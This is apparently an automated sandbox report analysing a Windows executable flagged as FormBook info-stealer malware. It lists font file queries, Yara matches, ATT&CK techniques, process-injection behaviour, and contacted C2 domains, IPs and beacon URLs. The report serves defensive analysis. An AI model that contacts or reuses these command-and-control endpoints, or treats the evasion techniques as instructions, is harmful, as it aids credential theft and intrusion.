          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Fonts\micross.ttf | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
Source: C:\Users\user\Desktop\divpCHa0h7.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

Yara detected FormBook (same Yara matches as listed under Stealing of Sensitive Information)

          Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 512 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 221 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 512 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | System Information Discovery 112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 4 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 23 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |

          Behavior Graph

[Behavior graph image not recoverable; information recovered from the graph text follows.]
Behavior Graph ID: 502315 | Sample: divpCHa0h7.exe | Startdate: 13/10/2021 | Architecture: WINDOWS | Score: 100
Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures
Top-level DNS/IP nodes: www.kangrungao.com; www.begukiu0.info; a.mb.cn
divpCHa0h7.exe (started) -> dropped C:\Users\user\AppData\...\divpCHa0h7.exe.log, ASCII; signatures: Detected unpacking (changes PE section rights); Tries to detect virtualization through RDTSC time measurements
divpCHa0h7.exe -> divpCHa0h7.exe (three child instances started); signatures on the injecting child: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
divpCHa0h7.exe (child) -> msdt.exe (started); signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
divpCHa0h7.exe (child) -> explorer.exe (injected); signature: System process connects to network (likely due to code injection or exploit); network: www.sanlifalan.com 104.165.34.6, 49768, 80, EGIHOSTINGUS, United States; websites076.homestead.com 108.167.135.122, 49789, 80, UNIFIEDLAYER-AS-1US, United States; 6 other IPs or domains
msdt.exe -> cmd.exe (started) -> conhost.exe (started)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
divpCHa0h7.exe | 16% | Virustotal |
divpCHa0h7.exe | 17% | ReversingLabs |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

Source | Detection | Scanner | Label
5.2.divpCHa0h7.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.1.divpCHa0h7.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

Source | Detection | Scanner | Label
www.sanlifalan.com | 0% | Virustotal |


          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.sanlifalan.com | 104.165.34.6 | true | true | | unknown
floaterslaser.com | 81.169.145.161 | true | false | | high
www.mambacustomboats.com | 64.190.62.111 | true | false | | high
shops.myshopify.com | 23.227.38.74 | true | false | | high
websites076.homestead.com | 108.167.135.122 | true | false | | high
a.mb.cn | 8.212.24.67 | true | false | | high
www.esyscoloradosprings.com | unknown | unknown | false | | high
www.kangrungao.com | unknown | unknown | false | | high
www.begukiu0.info | unknown | unknown | false | | high
www.ribbonofficial.com | unknown | unknown | false | | high
www.floaterslaser.com | unknown | unknown | false | | high

                              Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.floaterslaser.com/fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=cd5R1bQkGt60ucaw3I3E0k/wUnqrUWXrQueIKe7m3jIZGD6slZfTAntz2qvR4Gb0BO+l | true | Avira URL Cloud: safe | unknown
www.esyscoloradosprings.com/fqiq/ | true | Avira URL Cloud: safe | low
http://www.sanlifalan.com/fqiq/?ZvEd=prTEVkQtidVRbelnknUsCYHPcHrUQSHWronmvObfBYwGPcpLSCQwPhh2tosJT24FW2ZT&z0DH=f0Dtar1PYnAdDzS | true | Avira URL Cloud: safe | unknown
http://www.esyscoloradosprings.com/fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzS | true | Avira URL Cloud: safe | unknown
http://www.ribbonofficial.com/fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe1OoxOfJLYr | true | Avira URL Cloud: safe | unknown
http://www.mambacustomboats.com/fqiq/?ZvEd=oM7C4s4K9Ux9NUwG97tedYlymorHgm5Kv3Umj1Gnv/i5ubiDMWU/+XDfdu3U3Pyuil7R&z0DH=f0Dtar1PYnAdDzS | true | Avira URL Cloud: safe | unknown


                                                  Contacted IPs


                                                  Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.165.34.6 | www.sanlifalan.com | United States | 18779 | EGIHOSTINGUS | true
108.167.135.122 | websites076.homestead.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false
23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | false
81.169.145.161 | floaterslaser.com | Germany | 6724 | STRATOSTRATOAGDE | false
64.190.62.111 | www.mambacustomboats.com | United States | 11696 | NBS11696US | false

                                                  General Information

                                                  Joe Sandbox Version: 33.0.0 White Diamond
                                                  Analysis ID: 502315
                                                  Start date: 13.10.2021
                                                  Start time: 19:45:01
                                                  Joe Sandbox Product: CloudBasic
                                                  Overall analysis duration: 0h 12m 55s
                                                  Hypervisor based Inspection enabled: false
                                                  Report type: full
                                                  Sample file name: divpCHa0h7.exe
                                                  Cookbook file name: default.jbs
                                                  Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes: 30
                                                  Number of new started drivers analysed: 0
                                                  Number of existing processes analysed: 0
                                                  Number of existing drivers analysed: 0
                                                  Number of injected processes analysed: 0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode: default
                                                  Analysis stop reason: Timeout
                                                  Detection: MAL
                                                  Classification: mal100.troj.evad.winEXE@12/1@8/5
                                                  EGA Information: Failed
                                                  HDC Information:
                                                  • Successful, ratio: 11% (good quality ratio 9.7%)
                                                  • Quality average: 72%
                                                  • Quality standard deviation: 32.6%
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 84
                                                  • Number of non-executed functions: 103
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Found application associated with file extension: .exe
                                                  Warnings:
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 20.82.210.154, 204.79.197.200, 13.107.21.200, 95.100.218.79, 95.100.216.89, 2.20.178.33, 2.20.178.24, 40.112.88.60, 20.50.102.62
                                                  • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                                  • Not all processes were analyzed; the report is missing behavior information.
                                                  • Report creation exceeded the maximum time and may be missing disassembly code information.
                                                  • Report size is getting too big: too many NtAllocateVirtualMemory calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  Time | Type | Description
                                                  19:46:07 | API Interceptor | 2x Sleep call for process: divpCHa0h7.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  No context

                                                  Domains

                                                  No context

                                                  ASN

                                                  No context

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\divpCHa0h7.exe.log
                                                  Process: C:\Users\user\Desktop\divpCHa0h7.exe
                                                  File Type: ASCII text, with CRLF line terminators
                                                  Category: dropped
                                                  Size (bytes): 1308
                                                  Entropy (8bit): 5.348115897127242
                                                  Encrypted: false
                                                  SSDEEP: 24:MLUE4KJXE4qpE4Ks2E1qE4qpAE4Kzr7RKDE4KhK3VZ9pKhPKIE4oKFKHKorE4x88:MIHKtH2HKXE1qHmAHKzvRYHKhQnoPtH2
                                                  MD5: 832D6A22CE7798D72609B9C21B4AF152
                                                  SHA1: B086DE927BFEE6039F5555CE53C397D1E59B4CA4
